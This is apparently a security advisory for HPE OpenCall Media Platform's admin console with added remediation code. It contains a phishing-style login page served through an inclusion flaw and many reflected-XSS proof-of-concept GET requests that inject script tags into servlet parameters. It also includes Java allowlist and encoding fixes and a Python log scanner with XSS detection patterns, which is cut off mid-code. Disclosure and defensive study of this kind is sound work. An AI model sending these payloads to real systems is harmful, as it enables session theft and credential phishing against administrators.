Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2565
Date: Wed, 09 Sep 2015 13:00:53 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>PHISHING LOGIN PAGE</title>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<link rel="Shortcut Icon" href="/login/images/hp.ico">
<script>
function onLoginFornLoad() {
document.getElementById("txtUsername").focus();
}
</script>
<style type="text/css">
.style1
{
width: 290px;
}
.style2
{
width: 285px;
}
</style>
</head>
<body onload="onLoginFornLoad()">
<h2>PHISHING LOGIN PAGE</h2>
<script>document.write("I`m also running JS");</script>
<form action="j_security_check" method="POST">
<table cellpadding="0" cellspacing="0" width="100%" height="100%"
style="background-color: #ffffff">
<tr>
<td align="center" valign="middle">
<table cellpadding="0" cellspacing="0" height="309"
style="border: 1px solid #000000; background-position:
left top; background-image:url('/login/images/hp_logo.png');
background-repeat: no-repeat; width: 576px; clip: rect(1px, auto,
auto, auto);" >
<tr>
<td class="style2"> </td>
<td class="style1">
<table cellpadding="0" cellspacing="0">
<tr>
<td width="60"
style="font-family: Arial, Helvetica,
sans-serif; color: #000000; font-weight: bold">
User Name </td>
<td><input name="j_username" type="text" size="14"
style="width: 193px;"
id="txtUsername" value=""></td>
</tr>
<tr><td colspan="2" height="3"></td></tr>
<tr>
<td style="font-family: Arial, Helvetica,
sans-serif; font-weight: bold">Password </td>
<td><input name="j_password" type="password"
size="14" style="width: 191px"></td>
</tr>
<tr><td colspan="2" height="3"></td></tr>
<tr><td colspan="2"> </td></tr>
<td colspan="2" align="right">
<button type="submit" value="Log in"
style="width:54px; margin-top:8px">Login</button>
</td>
</tr>
</table>
</td>
<td style="background-color: #FFFFFF"> </td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>
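proxylink.do fetches whatever URL it is handed and renders the result under the admin console's origin. The legitimate uses visible in the call.do response above all point at cluster nodes over HTTPS on port 5443 under /mit/, which is enough to build an allowlist. The following is an added example, not HPE's code and not part of the advisory, of such a check; the host names tb0ocmp0 and tb0ocmp1, the port and the /mit/ prefix are taken from the advisory's own links, and the class name ProxyLinkAllowlist is an assumption.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.Set;

/**
 * Allowlist check for a "proxy this URL" parameter such as proxylink.do?url=...
 * Illustrative remediation: the proxy endpoint should refuse any target whose
 * scheme, host, port or path is not one the console itself generates.
 */
public final class ProxyLinkAllowlist {

    // Assumption: the only legitimate targets are the cluster nodes listed in the
    // call.do response, reached over HTTPS on 5443, under the /mit/ tree.
    private static final Set<String> ALLOWED_HOSTS = Set.of("tb0ocmp0", "tb0ocmp1");
    private static final int ALLOWED_PORT = 5443;
    private static final String ALLOWED_PATH_PREFIX = "/mit/";

    private ProxyLinkAllowlist() {}

    /** Returns true only when every component of the (already URL-decoded) value matches the allowlist. */
    public static boolean isAllowed(String rawUrl) {
        if (rawUrl == null || rawUrl.isEmpty()) {
            return false;
        }
        URI uri;
        try {
            uri = new URI(rawUrl);
        } catch (URISyntaxException e) {
            return false;                                   // unparsable input is never proxied
        }
        if (!uri.isAbsolute() || uri.isOpaque()) {
            return false;                                   // need a scheme://host/... form
        }
        if (!"https".equalsIgnoreCase(uri.getScheme())) {
            return false;                                   // plain http and other schemes are out
        }
        if (uri.getUserInfo() != null) {
            return false;                                   // https://tb0ocmp0@other-host:5443/ tricks
        }
        String host = uri.getHost();
        if (host == null || !ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT))) {
            return false;
        }
        if (uri.getPort() != ALLOWED_PORT) {
            return false;                                   // the port must be explicit and match
        }
        String path = uri.normalize().getPath();            // collapses /mit/../something
        return path != null && path.startsWith(ALLOWED_PATH_PREFIX);
    }

    public static void main(String[] args) {
        // A legitimate target, copied from the call.do response (query string shortened).
        String cdrLink = "https://tb0ocmp1:5443/mit/system/cdr/vxi_dialog_0_32_634_3?multinodeUser=ocadmin";
        // The target used in the advisory's RFI proof of concept.
        String rfiLink = "http://172.27.120.220:9595/fruuuuk.txt";
        // Constructed edge cases: path traversal out of /mit/, and a userinfo trick.
        String traversal = "https://tb0ocmp0:5443/mit/../login/";
        String userInfo = "https://tb0ocmp0@tb0ocmp9:5443/mit/logs/";

        System.out.println("cluster CDR link : " + isAllowed(cdrLink));
        System.out.println("RFI PoC target   : " + isAllowed(rfiLink));
        System.out.println("traversal        : " + isAllowed(traversal));
        System.out.println("userinfo trick   : " + isAllowed(userInfo));
    }
}
```

Only the first of the four inputs passes. Note that the decision is made on the parsed components, not on substring matches against the raw string, and that the raw value is the decoded url parameter as the servlet container hands it over; a check that ran on the still-percent-encoded form would see a different string than the one the proxy eventually fetches.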
Platform Administration Tool – Reflected Cross-Site Scripting (XSS) that leads to Remote Code Execution
HPE OpenCall Media Platform (OCMP) does not sanitize the cmd parameter
of the cdrdispatch function (cmd=DisplayBaseCdrBrowsePage). An attacker
can inject malicious JavaScript to trigger the Cross-Site Scripting
(XSS).
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePagef5df3<script>alert(1)<%2fscript>1d8b4&sessionType=NONE HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFMonitorMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_TYPE0 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize the LEV_TYPE0
parameter of the GetMapAction function. An attacker can inject
malicious JavaScript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T021985"><script>alert(1)<%2fscript>0ca30&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T021985"><script>alert(1)<%2fscript>0ca30&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
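The call.do and event.do cases reflect the type parameter into HTML text (the "Call Management -> ... Calls" heading, a confirm() message) and into a double-quoted attribute (the hidden type field), and the GetMapAction LEV_TYPEn cases show the attribute form directly: the probe starts with "> to close the attribute before its script tag. One encoder covers both contexts. The following is an added example, not HPE's code and not part of the advisory, of that encoder applied the way the vulnerable pages build their markup; the class name ReflectedParamEncoding and the allowlist in isKnownCallType (only "Active" is visible in the advisory) are assumptions.

```java
import java.util.Set;

/**
 * Output encoding for request values that call.do, event.do and
 * BMPFFaultMgr.chailet reflect into HTML. Illustrative fix, not OCMP's code:
 * a maintained library such as the OWASP Java Encoder or JSTL's <c:out>
 * does the same job and is what production code should use.
 */
public final class ReflectedParamEncoding {

    private ReflectedParamEncoding() {}

    /**
     * Encode a value for an HTML text node or a double-quoted attribute value.
     * Every character that can open a tag, close an attribute or start an entity
     * becomes a character reference, so a probe such as <script>alert(1)</script>
     * is rendered as literal text instead of being parsed as markup.
     */
    public static String encodeForHtml(String value) {
        if (value == null) {
            return "";
        }
        StringBuilder out = new StringBuilder(value.length() + 16);
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;   // single-quoted attributes and JS strings
                case '/':  out.append("&#47;");  break;   // neutralises </script>-style close tags
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** The call.do heading, built the way the vulnerable page does but with the value encoded. */
    public static String callManagementHeading(String type) {
        return "<b>Call Management -> " + encodeForHtml(type) + " Calls</b>";
    }

    /** The event.do hidden field: attribute context, same encoder, same result. */
    public static String hiddenTypeField(String type) {
        return "<input type=\"hidden\" name=\"type\" value=\"" + encodeForHtml(type) + "\">";
    }

    /**
     * Stronger option for parameters that have a fixed set of legal values: reject
     * anything outside the allowlist before it reaches the page at all. The set is
     * an assumption; fill it from the real application's call types.
     */
    public static boolean isKnownCallType(String type) {
        return type != null && Set.of("Active").contains(type);
    }

    public static void main(String[] args) {
        // Probe string from the advisory's call.do and event.do requests.
        String textProbe = "Active637a3<script>alert(1)</script>c7e9f";
        // Attribute-breaking probe from the LEV_TYPE0 request (the leading "> closes the attribute).
        String attrProbe = "T021985\"><script>alert(1)</script>0ca30";

        System.out.println(callManagementHeading(textProbe));
        System.out.println(hiddenTypeField(attrProbe));
        System.out.println("known call type: " + isKnownCallType(textProbe));
    }
}
```

With the encoder in place the heading reads `&lt;script&gt;alert(1)&lt;&#47;script&gt;` in the HTML source and the hidden field's value stays inside its quotes, because the `"` that would have terminated the attribute is now `&quot;`. Encoding must happen at output time in the context of the surrounding markup; stripping characters on input is brittle and is not what the advisory's phrase "does not sanitize" should be taken to recommend.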
Platform Administration Tool – LEV_TYPE1 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize the LEV_TYPE1
parameter of the GetMapAction function. An attacker can inject
malicious JavaScript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T14527a"><script>alert(1)<%2fscript>2d848&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T14527a"><script>alert(1)<%2fscript>2d848&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_TYPE2 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize the GetMapAction
function parameter LEV_TYPE2. An attacker can inject malicious
JavaScript to trigger a reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2522b2"><script>alert(1)<%2fscript>54f45&LEV_TYPE3=T3
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2522b2"><script>alert(1)<%2fscript>54f45&LEV_TYPE3=T3 HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_TYPE3 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize the GetMapAction
function parameter LEV_TYPE3. An attacker can inject malicious
JavaScript to trigger a reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3ecc32"><script>alert(1)<%2fscript>54a0f
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3ecc32"><script>alert(1)<%2fscript>54a0f HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NAME0 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize the GetMapAction
function parameter LEV_NAME0. An attacker can inject malicious
JavaScript to trigger a reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0fa802"><script>alert(1)<%2fscript>671a8&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0fa802"><script>alert(1)<%2fscript>671a8&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NAME1 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize the GetMapAction
function parameter LEV_NAME1. An attacker can inject malicious
JavaScript to trigger a reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1f530e"><script>alert(1)<%2fscript>d677f&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1f530e"><script>alert(1)<%2fscript>d677f&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NAME2 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize the GetMapAction
function parameter LEV_NAME2. An attacker can inject malicious
JavaScript to trigger a reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N261a9f"><script>alert(1)<%2fscript>118f3&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N261a9f"><script>alert(1)<%2fscript>118f3&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NAME3 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize the GetMapAction
function parameter LEV_NAME3. An attacker can inject malicious
JavaScript to trigger a reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N30c4b8"><script>alert(1)<%2fscript>c10b2&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N30c4b8"><script>alert(1)<%2fscript>c10b2&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – GetMapAction function
HPE OpenCall Media Platform (OCMP) does not sanitize the GetMapAction
function input. An attacker can inject malicious JavaScript to
trigger a reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTMLaec5a"><script>alert(1)<%2fscript>70733&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTMLaec5a"><script>alert(1)<%2fscript>70733&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NUM parameter
HPE OpenCall Media Platform (OCMP) does not sanitize the GetMapAction
function parameter LEV_NUM. An attacker can inject malicious
JavaScript to trigger a reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=00b96d"><script>alert(1)<%2fscript>58400&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=00b96d"><script>alert(1)<%2fscript>58400&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – NAME parameter
HPE OpenCall Media Platform (OCMP) does not sanitize the GetMapAction
function parameter NAME. An attacker can inject malicious JavaScript
to trigger a reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root8c0d0"><script>alert(1)<%2fscript>b811a&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root8c0d0"><script>alert(1)<%2fscript>b811a&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – next parameter
HPE OpenCall Media Platform (OCMP) does not sanitize the cdrdispatch
function parameter next. An attacker can inject malicious JavaScript
to trigger a reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/cdrdispatch?sessionType=ACTIVE&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePagea908f<script>alert(1)<%2fscript>2f6bfa40b3d&CallSessionList=ACTIVE
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /OCMPOAM/cdrdispatch?sessionType=ACTIVE&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePagea908f<script>alert(1)<%2fscript>2f6bfa40b3d&CallSessionList=ACTIVE HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePage&sessionType=NONE
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – sessionType parameter
HPE OpenCall Media Platform (OCMP) does not sanitize the cdrdispatch
function parameter sessionType. An attacker can inject malicious
JavaScript to trigger a reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/cdrdispatch?sessionType=25ed6"><script>alert(1)<%2fscript>1b604fa73f3&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePage&CallSessionList=ACTIVE
Proof of Concept
An attacker sends the following GET request to the victim's machine:
GET /OCMPOAM/cdrdispatch?sessionType=25ed6"><script>alert(1)<%2fscript>1b604fa73f3&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePage&CallSessionList=ACTIVE HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePage&sessionType=NONE
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
CVEs
CVE-2017-5799 – Remote Code Execution
CVE-2017-5798 – Reflected Cross-Site Scripting (XSS)
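Every finding above has the same shape: a query parameter of one of two OCMPOAM servlets is echoed into the HTML response unencoded, so a value ending in `"><script>` closes the attribute and opens a script element. The block below is an added example, not part of the HPE advisory and not HPE's code: it scans access-log lines for reflected-XSS probes against those two servlet paths and shows the attribute-safe encoding that would keep such a value inert. The log lines, client addresses and timestamps are constructed; only the two servlet paths come from the advisory.

```python
"""Spot reflected-XSS probes against the OCMP admin servlets in access-log lines."""
import html
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Servlet paths named in the advisory; other paths are outside this check's scope.
WATCHED_PATHS = ("/OCMPOAM/BMPFFaultMgr.chailet", "/OCMPOAM/cdrdispatch")

# Markers of a value breaking out of an HTML attribute or opening a script element.
# Applied after URL-decoding, case-insensitively.
XSS_MARKERS = re.compile(r'''<\s*/?script|["']\s*>|javascript:|\bon[a-z]+\s*=''', re.I)

# Combined Log Format: client ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
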